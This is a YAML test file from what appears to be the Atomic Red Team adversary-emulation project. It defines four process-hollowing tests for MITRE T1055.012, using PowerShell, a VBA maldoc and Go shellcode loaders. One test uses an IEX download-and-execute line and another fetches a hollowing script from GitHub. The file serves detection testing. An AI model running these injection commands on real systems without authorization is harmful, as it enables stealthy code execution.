security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1055.012/T1055.012.yaml
T
Mattis b0b572815d T1055.012 Process Hollowing using PowerShell - Add prerequisite check and installation commands (#3127) 
Co-authored-by: Mattis Swannet <mattis.swannet@nynox.eu>
Co-authored-by: Hare Sudhan <code@0x6c.dev>
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2025-07-17 16:29:13 -06:00

137 lines
5.6 KiB
YAML
Raw Permalink Blame History

attack_technique: T1055.012
display_name: 'Process Injection: Process Hollowing'
atomic_tests:
- name: Process Hollowing using PowerShell
auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c
description: |
This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.
Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside the sponsor)
type: string
default: C:\Windows\System32\cmd.exe
parent_process_name:
description: Name of the parent process
type: string
default: explorer
sponsor_binary_path:
description: Path of the sponsor binary (executable that will host the binary)
type: string
default: C:\Windows\System32\notepad.exe
spawnto_process_name:
description: Name of the process to spawn
type: string
default: notepad
executor:
command: |
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: |
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
dependency_executor_name: powershell
dependencies:
- description: |
Start-Hollow.ps1 must be installed
prereq_command: |
if (Test-Path "#{script_path}") {exit 0} else {exit 1}
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: |
This module executes notepad.exe from within the WINWORD.EXE process
supported_platforms:
- windows
input_arguments:
ms_product:
description: Maldoc application Word
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft #{ms_product} must be installed
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
name: powershell
- name: Process Hollowing in Go using CreateProcessW WinAPI
auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
description: |
Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
supported_platforms:
- windows
input_arguments:
hollow_binary_path:
description: Path of the binary to hollow
type: string
default: C:\Windows\System32\werfault.exe
hollow_process_name:
description: Name of the process to hollow
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: |
$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program "#{hollow_binary_path}" -debug
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
- name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
description: |
Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
allows for the retrieval of output generated from executed shellcode.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
supported_platforms:
- windows
input_arguments:
hollow_binary_path:
description: Path of the binary to hollow
type: string
default: C:\Windows\System32\werfault.exe
hollow_process_name:
description: Name of the process to hollow
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: |
$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe -program "#{hollow_binary_path}" -debug
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
Reference in New Issue View Git Blame Copy Permalink